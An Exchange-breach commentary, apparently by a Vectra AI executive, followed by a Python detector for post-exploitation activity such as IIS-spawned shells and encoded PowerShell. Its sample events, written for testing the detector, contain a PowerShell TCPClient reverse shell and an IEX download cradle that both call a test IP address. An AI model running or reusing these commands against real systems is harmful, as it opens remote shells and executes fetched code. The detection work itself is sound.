Vectra AI CTO Oliver Tavakoli’s comment on Microsoft Exchange breach



The hack involved the combined exploitation of multiple 0-day vulnerabilities, starting with an OWA SSRF vulnerability and then proceeding to the exploitation of other vulnerabilities to burrow deeper into the inner workings of the server.

Patching the Exchange servers will prevent an attack if the Exchange server has not already been compromised. But it will not undo the foothold attackers have on already compromised Exchange servers. Microsoft has published a technical blog on how to recognize signs that an Exchange Server is already compromised.

Remediation will not be simple — it will effectively require backing up data, re-imaging the Exchange server, scrubbing the backup of any accounts which should not be present, resetting all passwords and secrets, and restoring the remaining backup data.

Complex software which has been around for a long time (Exchange and OWA certainly qualify in this regard) will almost invariably contain flaws which, given sufficient motivation, resources and skill, will be discovered and exploited. The key to resilience in these cases is to have the capability to detect downstream activity necessary to capitalize on the foothold gained — the good news is that this activity (e.g. the use of a reverse shell, the abuse of PowerShell, etc.) almost always follows more standard tradecraft which can be detected by Network Detection and Response products.
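The comment above argues that the post-exploitation activity (reverse shells, PowerShell abuse) is where detection pays off. The following is an added illustration of that idea and is not part of the original comment or of any Vectra or Microsoft tooling: a small Python detector run over constructed process-creation events of the kind an EDR or Sysmon would record. The rules are generic, well-known patterns (the IIS worker process w3wp.exe spawning a shell, an -EncodedCommand payload, a TCPClient reverse shell, an IEX download cradle); the host names, parent/child images, IP addresses and command lines are all constructed sample data, and the rule names and thresholds are assumptions chosen for the example, not indicators published for this incident.

```python
"""Flag post-exploitation tradecraft in process-creation events.

Added illustration for the comment above. The detection rules are generic
patterns; every event below is constructed sample data, not a real capture.
"""

import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_image: str   # e.g. w3wp.exe, the IIS worker process that hosts OWA/ECP
    image: str
    command_line: str


# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (assumed min length 16)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)
# Classic .NET reverse shell: open a TCP client, then read/write its stream
REVERSE_SHELL = re.compile(r"Net\.Sockets\.TCPClient.*GetStream\(\)", re.I | re.S)
# Download cradle: fetch remote content and hand it to Invoke-Expression (either order)
DOWNLOAD_CRADLE = re.compile(
    r"(?:IEX|Invoke-Expression).*(?:DownloadString|DownloadFile|Invoke-WebRequest)"
    r"|(?:DownloadString|DownloadFile|Invoke-WebRequest).*(?:IEX|Invoke-Expression)",
    re.I | re.S,
)
IIS_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def encode_for_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none / it is malformed."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> list:
    """Return the names of every rule the event matches (empty list if nothing fires)."""
    findings = []
    # A web shell runs inside the IIS worker, so commands it launches have w3wp.exe as parent.
    if event.parent_image.lower() in IIS_WORKERS and event.image.lower() in SHELLS:
        findings.append("shell spawned by IIS worker process")
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        findings.append("encoded PowerShell command")
    # Match content rules against the raw command line AND the decoded payload, so
    # encoding alone does not hide a reverse shell or cradle from the content rules.
    text = event.command_line + "\n" + (decoded or "")
    if REVERSE_SHELL.search(text):
        findings.append("TCPClient reverse shell")
    if DOWNLOAD_CRADLE.search(text):
        findings.append("download cradle")
    return findings


def triage(events) -> list:
    """Return (event, findings) pairs for every event that fired at least one rule."""
    return [(e, analyze(e)) for e in events if analyze(e)]


# Constructed sample events (assumed host names, TEST-NET addresses, invented command lines).
REVERSE_SHELL_SCRIPT = (
    '$c = New-Object System.Net.Sockets.TCPClient("198.51.100.7", 4444); $s = $c.GetStream()'
)
SAMPLE_EVENTS = [
    # Benign scheduled task: -ExecutionPolicy must NOT be mistaken for -e <encoded>.
    ProcessEvent("exch01", "svchost.exe", "powershell.exe",
                 r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\RotateLogs.ps1"),
    # Web shell running in IIS executes a recon command.
    ProcessEvent("exch01", "w3wp.exe", "cmd.exe", 'cmd.exe /c "whoami /all"'),
    # Web shell launches an encoded, hidden PowerShell reverse shell.
    ProcessEvent("exch01", "w3wp.exe", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(REVERSE_SHELL_SCRIPT)),
    # Plain-text download cradle launched from an interactive session.
    ProcessEvent("ws-042", "explorer.exe", "powershell.exe",
                 "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\""),
]


if __name__ == "__main__":
    for event, findings in triage(SAMPLE_EVENTS):
        print(f"{event.host}: {event.parent_image} -> {event.image}: {', '.join(findings)}")
```

The point of decoding the -EncodedCommand payload before applying the content rules is the practical one from the comment: the encoding is an obfuscation step, but the tradecraft underneath (a TCPClient reverse shell here) is standard and stays detectable once you look past it. The parent/child rule needs no content at all, which is why the w3wp.exe-spawns-cmd.exe event fires even for a harmless-looking `whoami`.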

